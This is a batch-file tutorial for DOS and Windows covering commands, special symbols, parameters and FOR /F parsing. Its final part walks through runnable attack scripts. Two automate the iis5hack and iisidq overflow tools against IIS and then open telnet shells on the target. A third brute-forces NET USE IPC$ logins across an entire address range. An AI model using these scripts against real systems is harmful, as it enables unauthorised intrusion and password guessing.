DOS/BAT batch file tutorial (collected and sorted)

Source: Internet
Author: User
Tags: echo command, echo message, eol, goto

The tutorial is divided into four parts: Part I covers the special commands used in batch files, Part II covers special symbols and batch files, Part III covers batch files and variables, and Part IV works through complete examples. Because the tutorial is fairly long, the magazine split it over two issues; the first issue carried Parts I and II. All four parts are reproduced here.





Part I: Special commands for batch files

A batch file is a plain text file with the extension .bat that contains a series of commands arranged in a particular order; the command interpreter executes them one after another. These commands are collectively called batch commands. The batch-specific commands are introduced below one by one.

1. REM

REM is the comment command. It is used to annotate a program: the text that follows REM on the line is neither displayed nor executed when the batch file runs. Example:

REM What you see here is a comment; this line is not executed.

Note: in the examples that follow, the explanation of a line is placed after REM on the line below it.





2. ECHO

ECHO is the echo command. Its main arguments are OFF and ON, which turn command echoing off or on; ECHO message displays a specific piece of text. Example:

ECHO OFF
REM The line above turns echoing off, so the commands that follow are not displayed as they execute
ECHO This is the message
REM The line above displays the string "This is the message"

Result of running it (saved as echo.bat):

C:\>echo.bat
This is the message

Note that the ECHO OFF line itself is still echoed, because echoing is only switched off once that command has run; Part II shows how the @ symbol suppresses that line as well.





3. GOTO

GOTO means jump. A line of the form :XXX defines a label in the batch file, and GOTO XXX then continues execution from the command after that label. Example:

:LABEL
REM The line above defines a label named LABEL
DIR C:\
DIR D:\
GOTO LABEL
REM The line above jumps back to LABEL and execution continues from there

Because the jump goes back to the top, this example never terminates: it lists C:\ and D:\ over and over until Ctrl+C is pressed. In practice a backward GOTO is paired with a condition (see IF below) that eventually jumps elsewhere, and the label used for leaving the program is conventionally placed at the end of the file.





4. CALL

The CALL command invokes another batch file from within a running batch file; when the called batch finishes, execution continues with the next line of the original batch. Example:

The contents of 2.bat are:

ECHO This is the content of 2.bat

The contents of 1.bat are:

ECHO This is the content of 1.bat
CALL 2.BAT
ECHO The contents of 1.bat and 2.bat have both been displayed

Result of running it (with echoing turned off):

C:\>1.bat
This is the content of 1.bat
This is the content of 2.bat
The contents of 1.bat and 2.bat have both been displayed

If 2.BAT were run from 1.bat without CALL, control would transfer to 2.bat and never return: the last ECHO in 1.bat would not run. CALL is therefore required whenever the caller has more work to do afterwards.





5. PAUSE

PAUSE suspends execution of the batch file and displays the prompt below; execution resumes when a key is pressed. Example:

C:\>PAUSE
Press any key to continue . . .





6. IF

IF is the conditional statement. It has three forms:

IF [NOT] ERRORLEVEL number command
IF [NOT] string1==string2 command
IF [NOT] EXIST filename command

Description:

NOT inverts the test, i.e. "if not".

ERRORLEVEL is the exit code returned by the last command that finished executing.

number is an exit code in the range 0 to 255. IF ERRORLEVEL number is true when the exit code is greater than or equal to number, not only when it is exactly equal. For that reason a series of ERRORLEVEL tests must be written from the largest value down to the smallest: written in ascending order, the first test (IF ERRORLEVEL 0) would always be true and the remaining tests would never be reached.

string1==string2: both sides are character data, the comparison is case-sensitive, and the equals sign must be doubled (exactly equal). The command to run follows the condition. When one side is a parameter that may be empty, enclose both sides in double quotes ("%1"=="2"); otherwise an empty parameter leaves IF ==2, which is a syntax error.

EXIST filename tests whether a file (or directory) exists.

IF ERRORLEVEL must be placed directly after the command whose exit code is to be tested; any command run in between replaces the value.

Examples:

1. IF [NOT] ERRORLEVEL number command

Test the exit code after the command has been executed.

ECHO OFF
DIR Z:
REM If the exit code is 1 or greater (failure), jump to label 1
IF ERRORLEVEL 1 GOTO 1
REM If the exit code is 0 (success), jump to label 0
IF ERRORLEVEL 0 GOTO 0
:0
ECHO The command executed successfully!
REM Jump to the EXIT label
GOTO EXIT
:1
ECHO The command failed to execute!
REM Jump to the EXIT label
GOTO EXIT
:EXIT
REM This is where the program exits

The tests are in descending order (1, then 0). DIR on a drive letter that does not exist returns a non-zero exit code, so on a machine without a Z: drive the failure message is displayed.

2. IF string1==string2 command

Compare the value of a parameter to make a decision.

ECHO OFF
IF NOT "%1"=="2" GOTO NO
ECHO The values are equal!
GOTO EXIT
:NO
ECHO The values are not equal
GOTO EXIT
:EXIT

Save it as test.bat and run C:\>test.bat number to see the effect. Because both sides are quoted, running it with no parameter at all reports "not equal" instead of failing with a syntax error.

3. IF [NOT] EXIST filename command

Look for a specific file to make a decision.

ECHO OFF
IF NOT EXIST AUTOEXEC.BAT GOTO 1
ECHO The file exists: success!
GOTO EXIT
:1
ECHO The file does not exist: failure!
GOTO EXIT
:EXIT

Place this batch file on C: and on D: in turn and run it to see the difference (AUTOEXEC.BAT normally exists only in the root of C:).
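As an added example (not part of the original tutorial), the following batch file combines the three forms of IF in the way a practitioner would actually use them: both parameters are checked with quoted comparisons so that a missing parameter cannot cause a syntax error, the file is checked with EXIST, and the script then branches on all three exit codes of FIND (0 = match found, 1 = no match, 2 = error) with the ERRORLEVEL tests in descending order. The file name findcheck.bat is an assumption chosen for the example; it is written for cmd.exe.

```batch
@ECHO OFF
REM Added example (not from the original tutorial): search a file for a string
REM and branch on all three exit codes of FIND: 0 = match found, 1 = no match,
REM 2 = error (for example the file could not be read). Parameters are compared
REM in double quotes so that a missing one cannot produce a syntax error.
REM Usage (file name findcheck.bat is an assumption): findcheck.bat file string

IF "%1"=="" GOTO USAGE
IF "%2"=="" GOTO USAGE
IF NOT EXIST %1 GOTO NOFILE

REM The output of FIND is discarded; only its exit code is needed.
FIND "%2" %1 > NUL
REM IF ERRORLEVEL n is true for any exit code >= n, so test 2, then 1, then 0.
IF ERRORLEVEL 2 GOTO FINDERR
IF ERRORLEVEL 1 GOTO NOMATCH
ECHO "%2" was found in %1
GOTO EXIT

:NOMATCH
ECHO "%2" was not found in %1
GOTO EXIT

:FINDERR
ECHO FIND reported an error while reading %1
GOTO EXIT

:NOFILE
ECHO The file %1 does not exist
GOTO EXIT

:USAGE
ECHO Usage: %0 file string
:EXIT
```

Run it as findcheck.bat C:\boot.ini timeout (any existing text file and a word will do). If the two ERRORLEVEL tests were swapped, every error from FIND would be reported as "not found", which is exactly the class of silent misdiagnosis the descending order avoids.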


7. FOR

FOR is a special command: it is the command used to loop, and a FOR loop can be nested inside another FOR. This article first explains the basic usage and then shows FOR applied in loops. In a batch file the syntax is:

FOR %%c IN (set) DO command [arguments]

At the command line the variable has a single percent sign:

FOR %c IN (set) DO command [arguments]

Common options:

/L The set is a numeric sequence written as (start,step,end). (1,1,5) produces 1 2 3 4 5 and (5,-1,1) produces 5 4 3 2 1.

/D If the set contains wildcards, directory names are matched instead of file names.

/F Reads data from the specified file (or from a string, or from the output of a command) and parses it line by line into variables. Its parsing options are given as a quoted string:

eol=c the end-of-line comment character (a single character); lines beginning with it are skipped.

skip=n the number of lines to skip at the start of the file.

delims=xxx the delimiter set; this replaces the default delimiters, space and tab.

tokens=x,y,m-n which tokens from each line are passed to the FOR body on each iteration; this causes extra variable names to be allocated. The m-n form is a range, from the m-th to the n-th token. If the last character of the tokens string is an asterisk, one extra variable is allocated that receives the remaining text of the line after the last token parsed.

usebackq selects the alternative quoting rules: a back-quoted string is executed as a command, a single-quoted string is a literal string, and double quotes may be used to quote a file name in the set.

Example:

FOR /F "eol=; tokens=2,3* delims=, " %i IN (myfile.txt) DO @ECHO %i %j %k

Each line of myfile.txt is parsed; lines beginning with a semicolon are ignored, and the second and third tokens of each line, delimited by commas and/or spaces, are passed to the FOR body. Note that the body refers to %i for the second token, %j for the third token and %k for everything after the third token. For a file name containing spaces, enclose the file name in double quotes; to use double quotes this way you must also give the usebackq option, otherwise the double quotes are interpreted as marking a literal string to be parsed.

%i is declared explicitly in the FOR statement; %j and %k are declared implicitly through the tokens= option. tokens= can specify up to 26 tokens per line, provided it does not attempt to declare a variable beyond the letter 'z' or 'Z'. Remember that FOR variables are single letters, are case-sensitive, are global, and that no more than 52 can be in use at the same time.

The FOR /F parsing logic can also be applied to an immediate string by making the set between the parentheses a quoted string; the string is then treated as a single line of input from a file. Finally, FOR /F can parse the output of a command: the set between the parentheses is then treated as a command line, passed to a child CMD.EXE, and its output is captured in memory and parsed as if it were a file. Which quotes mean what depends on usebackq: without it, 'string' is executed as a command and "string" is the literal string; with usebackq, `string` (back quotes) is executed as a command, 'string' is the literal string and "name" is a file name. For example:

FOR /F "usebackq delims==" %i IN (`SET`) DO @ECHO %i

enumerates the names of the environment variables in the current environment (everything before the first = on each line of SET's output).

The following simple example illustrates the difference between using /L and using no option. Delete the files 1.TXT, 2.TXT, 3.TXT, 4.TXT and 5.TXT:

ECHO OFF
FOR /L %%f IN (1,1,5) DO DEL %%f.txt

or

FOR %%f IN (1,2,3,4,5) DO DEL %%f.txt

The two commands produce the same result:

C:\>del 1.TXT
C:\>del 2.TXT
C:\>del 3.TXT
C:\>del 4.TXT
C:\>del 5.TXT
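As an added example (not part of the original tutorial) of the FOR /F options just described, the following batch file first writes a small constructed data file with ECHO and redirection and then parses it with skip=, eol=, delims= and tokens=, including the asterisk token that captures the rest of a line; it finishes by applying the same parser to the output of a command with usebackq. The record format (user,host,result), the comment character # and the file name logins.txt are assumptions made for the example; it requires cmd.exe (Windows 2000 or later), which is the interpreter this tutorial is based on.

```batch
@ECHO OFF
REM Added example (not from the original tutorial): write a small constructed
REM data file with ECHO and redirection, then parse it with FOR /F.
REM The record format is an assumption for this example: a header line,
REM comment lines beginning with #, and records of the form user,host,result.

ECHO user,host,result> logins.txt
ECHO # comment lines begin with a hash and are skipped by eol=#>> logins.txt
ECHO alice,srv01,OK>> logins.txt
ECHO bob,srv02,FAIL>> logins.txt
ECHO # carol,srv03,FAIL>> logins.txt
ECHO dave,srv01,FAIL extra text>> logins.txt

REM skip=1 drops the header, eol=# drops comment lines, delims=, splits on commas.
REM tokens=1,2* gives %%a=user, %%b=host and %%c=everything after the second comma,
REM so the last record yields "FAIL extra text" in %%c and is not reported as FAIL.
FOR /F "skip=1 eol=# tokens=1,2* delims=," %%a IN (logins.txt) DO (
    IF "%%c"=="FAIL" ECHO Failed login: user %%a on host %%b
)

REM The same parser applied to command output: with usebackq the back-quoted
REM SET PATH runs in a child cmd.exe, delims== splits name from value and
REM tokens=1 keeps only the name, so every variable beginning with PATH is listed.
FOR /F "usebackq tokens=1 delims==" %%v IN (`SET PATH`) DO ECHO Variable defined: %%v
```

The only record reported is bob on srv02. The comment line for carol is skipped by eol=#, the header is skipped by skip=1, and dave's line is not reported because the asterisk token collects "FAIL extra text" rather than "FAIL", which is the behaviour to keep in mind when a field can contain the delimiter or trailing text.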





8. SETLOCAL

SETLOCAL begins localization of environment changes in a batch file. After SETLOCAL has been executed, changes made to environment variables are confined to the batch file; to restore the original settings, ENDLOCAL must be executed. When the end of the batch file is reached, an implicit ENDLOCAL is executed for every SETLOCAL that is still in effect. Example:

@ECHO OFF
SET PATH
REM The line above displays the environment variable PATH
PAUSE
SETLOCAL
SET PATH=E:\TOOLS
REM The line above resets the environment variable PATH
SET PATH
PAUSE
ENDLOCAL
SET PATH

In the example above, the first time PATH is displayed it has the system default value; after it is set to E:\TOOLS it is displayed as E:\TOOLS; but after ENDLOCAL we can see that it has been restored to the system default. The change is only in force while the batch file runs, and because of SETLOCAL the original PATH is also restored when the batch file finishes. Note that this restoration depends on SETLOCAL: a SET executed in a batch file without SETLOCAL changes the environment of the command session that ran the batch file and stays in effect for the rest of that session.





9. SHIFT

SHIFT lets a batch file use more than the ten replaceable parameters %0 to %9: each SHIFT discards %0 and moves every parameter down by one place, so %1 takes the old value of %2 and %9 receives the next unused argument from the command line. Example:

ECHO OFF
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9

Result of running it (saved as shift.bat):

C:\>shift.bat 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11

The nine batch commands above are described as they behave on Windows 2000.





Part II: Special symbols and batch files

Some symbols are not allowed on the command line at all, and others have special meanings.

1. Symbol (@)

@ turns off echoing for the current line only. We saw above that ECHO OFF turns off echoing for all the commands that follow it, but cannot stop the ECHO OFF command itself from being displayed. Placing @ in front of it, as @ECHO OFF, suppresses the echo of that line too, so that no command in the batch file is echoed at all.

2. Symbol (>)

> means redirect and overwrite. It sends the output that a command would display to the target that follows the symbol (a file, or a device; the default target when nothing is redirected is the console). Example:

The contents of the file 1.txt are:

1+1

Run the command c:\>dir *.txt >1.txt

The contents of 1.txt are now:

 Volume in drive C has no label.
 Volume Serial Number is 301A-1508

 Directory of C:\

2003-03-11  14:04             1,005 frunlog.txt
2003-04-04  16:38        18,598,494 log.txt
2003-04-04  17:02                 5 1.txt
2003-03-12  11:43                 0 aierrorlog.txt
2003-03-30  00:35            30,571 202.108.txt
               5 File(s)     18,630,070 bytes
               0 Dir(s)   1,191,542,784 bytes free

> replaced the original contents of the file with the output of the command.

Redirecting output to the NUL device discards it, so the program displays nothing. (Note: this is a different kind of "echo" from ECHO OFF. ECHO OFF suppresses the display of the commands being executed; here it is the output produced by the program as it runs that is suppressed.) Example:

C:\>dir *.txt >nul

The program displays nothing and leaves nothing on the screen. Only normal output is redirected this way: error messages are written to a separate stream and still appear on the console (in cmd.exe they are redirected with 2>nul).

3. Symbol (>>)

>> is similar to >, the difference being that >> appends the output to the end of the file instead of overwriting it. Like >, it can also redirect to the console or to NUL (same usage as above). Example:

The same file 1.txt with contents:

1+1

Run the command c:\>dir *.txt >>1.txt

The contents of 1.txt are now:

1+1
 Volume in drive C has no label.
 Volume Serial Number is 301A-1508

 Directory of C:\

2003-03-11  14:04             1,005 frunlog.txt
2003-04-04  16:38        18,598,494 log.txt
2003-04-04  17:02                 5 1.txt
2003-03-12  11:43                 0 aierrorlog.txt
2003-03-30  00:35            30,571 202.108.txt
               5 File(s)     18,630,070 bytes
               0 Dir(s)   1,191,542,784 bytes free

>> appended the output of the command after the original contents of the file.

4. Symbol (|)

| is the pipe: it passes the output of the previous command to the next command as its input. Example:

C:\>dir c:\ | find "1508"
 Volume Serial Number is 301A-1508

The command above lists C:\ and searches the listing for the string 1508. For the usage of FIND, consult its help.

This is how I format a floppy automatically without using FORMAT's own unattended options:

ECHO Y|FORMAT A: /S /Q /V:SYSTEM

Anyone who has used FORMAT knows that it has an interactive step in which the user types Y to confirm that the command should proceed. Putting ECHO Y in front of it and piping the output into FORMAT with | supplies that Y as if it had been typed by hand. (This command is dangerous; be careful when testing it.)

5. Symbol (^)

^ is the escape character for the special symbols >, <, | and &. Placed before one of them, it removes the symbol's special function, so that it is treated as an ordinary character rather than by its special meaning. Example:

C:\>echo Test ^> 1.txt
Test > 1.txt

As you can see, "Test" was not written to the file 1.txt; instead the whole string Test > 1.txt was displayed. This symbol is very useful when building a batch file remotely, that is, when writing a batch file line by line with ECHO ... >> file.bat: a redirection or pipe that is meant to end up inside the generated file must be escaped so that the ECHO line itself does not act on it.

6. Symbol (&)

& lets two or more commands be placed on one line; the second command still runs when the first one fails. Example:

c:\>dir z:\ & dir y:\ & dir c:\

The command above displays the contents of Z:, Y: and C: one after another regardless of whether each drive letter exists; a missing drive only produces an error message for that part.

7. Symbol (&&)

&& also lets two or more commands be placed on one line, but once a command fails the commands that follow it are no longer executed. Example:

c:\>dir z:\ && dir y:\ && dir c:\

The command above first checks whether Z: exists: if it does, execution continues with the next DIR; if it does not, all the following commands are skipped.

8. Symbol ("")

Double quotes allow spaces to be included in a string. To change into a directory whose name contains a space, any of the following can be used:

C:\>CD "Program Files"
C:\>CD PROGRA~1
C:\>CD PRO*

All of the above enter the Program Files directory. The quoted form is the reliable one: the short name PROGRA~1 depends on how the file system generated it, and CD PRO* changes to the first directory matching the pattern, which may be a different one if several names begin with PRO.

9. Symbol (,)

The comma is equivalent to a space as a separator and can be used instead of a space in some special cases. Example:

C:\>dir,c:\

10. Symbol (;)

When the same command is to be applied to several arguments, ; can separate the arguments and the command is executed for each of them, unchanged. If an error occurs for one argument, only that error message is reported and the command continues with the next argument. Example:

DIR C:\;D:\;E:\;F:\

The command above is equivalent to:

DIR C:\
DIR D:\
DIR E:\
DIR F:\

There are other special symbols as well, but they are used so rarely that they are not covered here.
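As an added example (not part of the original tutorial), the following batch file does what the ^ section calls "building a batch remotely": it writes a second batch file line by line with ECHO and >>, escaping the redirections and pipes that belong inside the generated file, then runs the generated file with CALL, chains a follow-up command with &&, and tests the result with FIND and >NUL. The file names collect.bat and dirlist.txt are assumptions chosen for the example; it is written for cmd.exe.

```batch
@ECHO OFF
REM Added example (not from the original tutorial): build a second batch file
REM line by line with ECHO and >>, which is what "building a batch remotely"
REM means in practice. Redirections and pipes that belong inside the generated
REM file are escaped with ^ so that the ECHO line itself does not execute them.
REM The file names collect.bat and dirlist.txt are assumptions for the example.

SET GEN=collect.bat
IF EXIST %GEN% DEL %GEN%

REM Every ^>, ^>^> and ^| is written literally into collect.bat; only the final,
REM unescaped >> on each line is acted on, appending the text to %GEN%.
ECHO @ECHO OFF>> %GEN%
ECHO REM generated by %0>> %GEN%
ECHO VER ^> dirlist.txt>> %GEN%
ECHO DIR C:\ ^| FIND "Serial" ^>^> dirlist.txt>> %GEN%

REM Show what was generated, then run it. CALL returns to this file afterwards;
REM && runs the DIR only if collect.bat finished with exit code 0.
TYPE %GEN%
CALL %GEN% && DIR dirlist.txt

REM Test the result: the output goes to NUL, only FIND's exit code matters, and
REM the tests are ordered from the largest value down as IF ERRORLEVEL requires.
FIND "Serial" dirlist.txt > NUL
IF ERRORLEVEL 2 ECHO dirlist.txt could not be read
IF ERRORLEVEL 1 IF NOT ERRORLEVEL 2 ECHO No volume serial number was captured
IF NOT ERRORLEVEL 1 ECHO Volume serial number captured in dirlist.txt
```

TYPE shows that collect.bat contains plain > and >> and | where the generator had ^>, ^>^> and ^|; had any of them been left unescaped, the generator would have redirected or piped its own ECHO output instead of writing the symbol into the file, which is the usual mistake when scripts are assembled this way over a remote shell.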





Part III: Batch files and variables

Using variables appropriately makes a batch file far more widely applicable. Each batch file has ten replaceable parameters, %0 to %9, of which %0 holds the name of the batch file itself. %0 cannot be replaced by %1 unless the SHIFT command is used. Referring to the SHIFT example above: if %0 is added in front of %1 on each ECHO line, the result becomes:

C:\>shift.bat 1 2 3 4 5 6 7 8 9 10 11
shift.bat 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11

How does the system tell the parameters apart? The rule is the space between strings: whenever a space is found, the characters before it form one parameter and the characters after it form the next. If a parameter is a long directory name containing a space, it must be enclosed in the double quotes described under special symbol 8 in the previous part. Example:

The batch file contains:

ECHO %1
ECHO %2
ECHO %3

Enter the command:

C:\>test "Program Files" Program Files
"Program Files"
Program
Files

The quotes are part of the value of %1 and are displayed with it; in cmd.exe, %~1 gives the parameter with the surrounding quotes removed.

A complex batch file may need more than ten values at the same time, which conflicts with this rule of the system. How is that solved? The system also has environment variables (use the SET command to display the current ones); for example the current system directory is %windir% or %SystemRoot%. When more than ten parameters are needed at once, we can save some of them in environment variables for use later in the program. The usage is SET a=%1: this creates a new environment variable named a, which is referenced as %a%. Environment variables are not affected by SHIFT. To change an environment variable it must be SET again; a value can also be transferred from one variable to another. Consider the following batch file:

ECHO OFF
SET pass=%1
SHIFT
SET pass1=%1
SHIFT
ECHO %pass% %pass1% %1 %2 %3 %4 %5 %6 %7 %8 %9
ECHO %pass% %pass1% %9
REM Transfer the value of pass1 into pass
SET pass=%pass1%
SET pass1=%9
ECHO %pass% %pass1%

Run it with: C:\>test A B 3 4 5 6 7 8 9 K L

A B 3 4 5 6 7 8 9 K L    Note: this line shows all eleven values, the first two of them from environment variables
A B L                    After the two SHIFTs, %9 has become L
B L                      The result of the variable transfer
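As an added example (not part of the original tutorial), the following batch file shows the pattern that the SHIFT and environment-variable material above leads to in practice: a loop that walks through any number of parameters, counts them, and keeps the first three in environment variables so that they survive the later SHIFTs, with SETLOCAL confining those variables to the batch file. It uses %~1 and SET /A, which are cmd.exe syntax; the file name args.bat is an assumption chosen for the example.

```batch
@ECHO OFF
SETLOCAL
REM Added example (not from the original tutorial): walk through any number of
REM parameters with a SHIFT loop, count them, and keep the first three in
REM environment variables so that they survive the later SHIFTs.
REM %~1 (cmd.exe syntax) is %1 with surrounding double quotes removed, so a
REM parameter such as "C:\Program Files" is stored without the quotes.
REM Usage (file name args.bat is an assumption): args.bat "C:\Program Files" b c d e

SET COUNT=0
SET FIRST=
SET SECOND=
SET THIRD=

:NEXT
REM An empty %1 means the parameters are used up; the quoted comparison is what
REM makes this test safe when %1 is empty.
IF "%~1"=="" GOTO DONE
SET /A COUNT=COUNT+1
IF %COUNT%==1 SET FIRST=%~1
IF %COUNT%==2 SET SECOND=%~1
IF %COUNT%==3 SET THIRD=%~1
ECHO Parameter %COUNT%: %~1
SHIFT
GOTO NEXT

:DONE
ECHO %COUNT% parameters were supplied
ECHO First: "%FIRST%"  Second: "%SECOND%"  Third: "%THIRD%"
REM SETLOCAL above means COUNT, FIRST, SECOND and THIRD vanish here and do not
REM leak into the calling command session.
ENDLOCAL
```

Running args.bat "C:\Program Files" b c d e lists five parameters and reports First: "C:\Program Files" with the quotes added back by the ECHO line only. Because the loop stops at the first empty parameter, an explicit "" on the command line also ends it; if empty values must be allowed, the loop would have to count down from a known total instead.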








Part IV: Complete examples

The above covers the individual uses of batch commands. Now we combine them and analyse some batch files currently circulating online to see how they work. Three examples are given below with detailed analysis. So that each listing stays complete and runnable, my comments are given as REM lines following the line they explain.

Example One

This example is a batch file that uses iis5hack.exe against a host with the .printer vulnerability. It requires iis5hack.exe and the telnet.exe that ships with the system. The command format of iis5hack is:

iis5hack <target ip> <target port> <target version> <port for the shell>

The target version, a number from 0 to 9, corresponds to the different language versions and service pack levels of the target system. The batch file we write is used as iis.bat <target IP> [start version number]; the start version number is optional. The program is as follows:

@ECHO OFF
REM turn off command echoing
IF "%1"=="" GOTO HELP
REM if %1 (the target IP) is empty, show the help
IF "%2"=="1" GOTO 1
IF "%2"=="2" GOTO 2
IF "%2"=="3" GOTO 3
IF "%2"=="4" GOTO 4
IF "%2"=="5" GOTO 5
IF "%2"=="6" GOTO 6
IF "%2"=="7" GOTO 7
IF "%2"=="8" GOTO 8
REM %2 is the optional starting version number; if it is given, execution
REM starts at the matching label, otherwise every version is tried from 9 down
IF NOT EXIST iis5hack.exe GOTO FILE
REM if iis5hack.exe is not found, run the FILE section
PING %1 -n 1 | FIND "Received = 1"
REM ping the target once and look for "Received = 1" in the output
IF ERRORLEVEL 1 GOTO ERROR
REM FIND returns 1 when the string is not found (host unreachable), 0 when found
iis5hack %1 80 9 88 | FIND "good"
REM attempt the overflow against port 80 with system type 9 and a shell on port 88;
REM the string "good" appears in the output only if the overflow succeeded
IF NOT ERRORLEVEL 1 GOTO TELNET
REM exit code 0 means "good" was found: go to the TELNET section
ECHO OS type 9 failed!
REM otherwise report the failure and fall through to the next version
:8
iis5hack %1 80 8 88 | FIND "good"
IF NOT ERRORLEVEL 1 GOTO TELNET
ECHO OS type 8 failed!
:7
iis5hack %1 80 7 88 | FIND "good"
IF NOT ERRORLEVEL 1 GOTO TELNET
ECHO OS type 7 failed!
:6
iis5hack %1 80 6 88 | FIND "good"
IF NOT ERRORLEVEL 1 GOTO TELNET
ECHO OS type 6 failed!
:5
iis5hack %1 80 5 88 | FIND "good"
IF NOT ERRORLEVEL 1 GOTO TELNET
ECHO OS type 5 failed!
:4
iis5hack %1 80 4 88 | FIND "good"
IF NOT ERRORLEVEL 1 GOTO TELNET
ECHO OS type 4 failed!
:3
iis5hack %1 80 3 88 | FIND "good"
IF NOT ERRORLEVEL 1 GOTO TELNET
ECHO OS type 3 failed!
:2
iis5hack %1 80 2 88 | FIND "good"
IF NOT ERRORLEVEL 1 GOTO TELNET
ECHO OS type 2 failed!
:1
iis5hack %1 80 1 88 | FIND "good"
IF NOT ERRORLEVEL 1 GOTO TELNET
ECHO OS type 1 failed!
:0
iis5hack %1 80 0 88 | FIND "good"
IF NOT ERRORLEVEL 1 GOTO TELNET
ECHO OS type 0 failed!
GOTO ERROR
:TELNET
TELNET %1 88
REM connect to port 88 of the target
GOTO EXIT
REM when the connection is closed, jump to the EXIT section
:ERROR
REM the ERROR section shows help information after a failure
ECHO The network may be unreachable or the target has patched the vulnerability! Please try manually in the following format:
ECHO iis5hack [target IP] [web port] [system type] [shell port]
ECHO Chinese: 0
ECHO Chinese + SP1: 1
ECHO English: 2
ECHO English + SP1: 3
ECHO Japanese: 4
ECHO Japanese + SP1: 5
ECHO Korean: 6
ECHO Korean + SP1: 7
ECHO Mexican: 8
ECHO Mexican + SP1: 9
GOTO EXIT
:FILE
REM the FILE section reports that the file was not found
ECHO File iis5hack.exe not found! Program aborted!
GOTO EXIT
:HELP
REM the HELP section shows how to use this batch file
ECHO This program is used as follows:
ECHO iis [target IP]
ECHO iis [target IP] [start number 9-0]
:EXIT
REM program exit

This batch file has essentially no loops; it simply runs from top to bottom, which is why the code is long. Note that the reachability check depends on the English wording of PING's summary line ("Received = 1"); on a system with localized PING output the string never matches and every target is reported as unreachable.

Example Two

This example is a batch file that uses iisidq.exe against a machine with the IDQ vulnerability. It requires iisidq.exe and the telnet.exe that ships with the system. iisidq.exe is used as follows:

Run parameters: <operating system type> <target address> <web port> 1 <overflow listening port> <command to run>

If the command parameter is not given, it defaults to "cmd.exe". The operating system type code ranges from 0 to 14. Our batch file is used as idq.bat <target ip>. The program is as follows:

@ECHO OFF
REM as in Example One
IF NOT EXIST iisidq.exe GOTO FILE
REM as in Example One
IF "%1"=="" GOTO ERROR
REM as in Example One
PING %1 -n 1 | FIND "Received = 1"
REM as in Example One
IF ERRORLEVEL 1 GOTO ERROR1
REM as in Example One
SET b=%1
REM create environment variable b holding the contents of %1; b is the target IP from here on
SET a=0
REM create environment variable a and set it to 0; a is the counter that drives the loop of the whole batch file
:NO
REM start of the NO section
IF %a%==0 SET d=0
REM if a is 0, create environment variable d and set it to 0
IF %a%==1 SET d=1
REM d is the operating system type code; the counter controls how it changes
IF %a%==2 SET d=2
IF %a%==3 SET d=3
IF %a%==4 SET d=4
IF %a%==5 SET d=5
IF %a%==6 SET d=6
IF %a%==7 SET d=7
IF %a%==9 SET d=9
IF %a%==10 SET d=13
IF %a%==11 SET d=14
GOTO 0
REM variable transfer complete; go to label 0
:1
ECHO Trying type %d%! Cannot connect to target %b%! Retrying, please wait...
:0
REM start of label 0
iisidq %d% %b% 1 | FIND "good"
REM send the overflow and look for the string "good" in the result (it is printed when the code was sent successfully)
IF ERRORLEVEL 1 GOTO 1
REM if "good" was not found the code was not sent: go to label 1 and keep trying
PING 127.0.0.1 -n 8 > NUL
REM ping the local host 8 times, which amounts to a delay of about 8 seconds; the output is discarded
ECHO Executing type %d%!
REM report the operating system type being exploited
TELNET %b% 99
REM connect to the overflow port
ECHO.
REM display a blank line
IF %d%==14 GOTO ERROR1
REM if the operating system type is 14 (the last one), go to ERROR1 and leave the loop
IF %d%==13 SET a=11
REM otherwise advance the counter from the current operating system code
IF %d%==9 SET a=10
IF %d%==7 SET a=9
IF %d%==6 SET a=7
IF %d%==5 SET a=6
IF %d%==4 SET a=5
IF %d%==3 SET a=4
IF %d%==2 SET a=3
IF %d%==1 SET a=2
IF %d%==0 SET a=1
GOTO NO
REM counter updated; go back to the NO section
:FILE
REM below are the help messages shown after an error
ECHO iisidq.exe was not found! Put the file in the same directory as this batch file!
GOTO EXIT
:ERROR
ECHO Error! Target IP not recognised! Please use the following format:
ECHO idq [target IP]
GOTO EXIT
:ERROR1
ECHO The connection did not succeed! Perhaps the target has patched the vulnerability or there is a network failure!
ECHO Please try manually in the following format:
ECHO iisidq [target type] [target IP] [target port] [connection mode] [overflow port]
ECHO telnet [target IP] [overflow port]
:EXIT
REM exit of the whole program

The point of this batch file is the overall loop and the counter section. Two things to notice when reading it: the iisidq line passes fewer arguments (%d% %b% 1) than the usage given above, and in particular does not pass the port 99 that TELNET later connects to; the listing is reproduced as published. Also, when "good" is not found the jump to label 1 falls straight back into label 0, so a type that never succeeds is retried indefinitely; there is no retry limit.

Example Three

FOR /L %%a IN (0,1,255) DO FOR /L %%b IN (0,1,255) DO FOR /L %%c IN (1,1,254) DO FOR /F "tokens=1,2*" %%e IN (userpass.txt) DO NET USE \\%1.%%a.%%b.%%c\IPC$ %%e /U:%%f

The above is a single command that nests four FOR loops. It is used as c:\>test.bat 218. After 218 is entered, the first FOR gives %%a its initial value 0, the second FOR gives %%b its initial value 0, the third FOR gives %%c its initial value 1, and the last FOR reads userpass.txt, taking the first field of each line as the password in %%e and the second field as the user name in %%f (the asterisk token would hold anything else on the line). With those values and a line in userpass.txt giving the password 123 and the user name abc, the final command becomes:

NET USE \\218.0.0.1\IPC$ 123 /U:abc

This loop tries every line of userpass.txt against every address in 218.0.0.0/8, more than sixteen million hosts, and each NET USE attempt is a network logon that the target can record; the FOR /F form requires cmd.exe (Windows 2000 or later), and the options string must be in double quotes as shown.

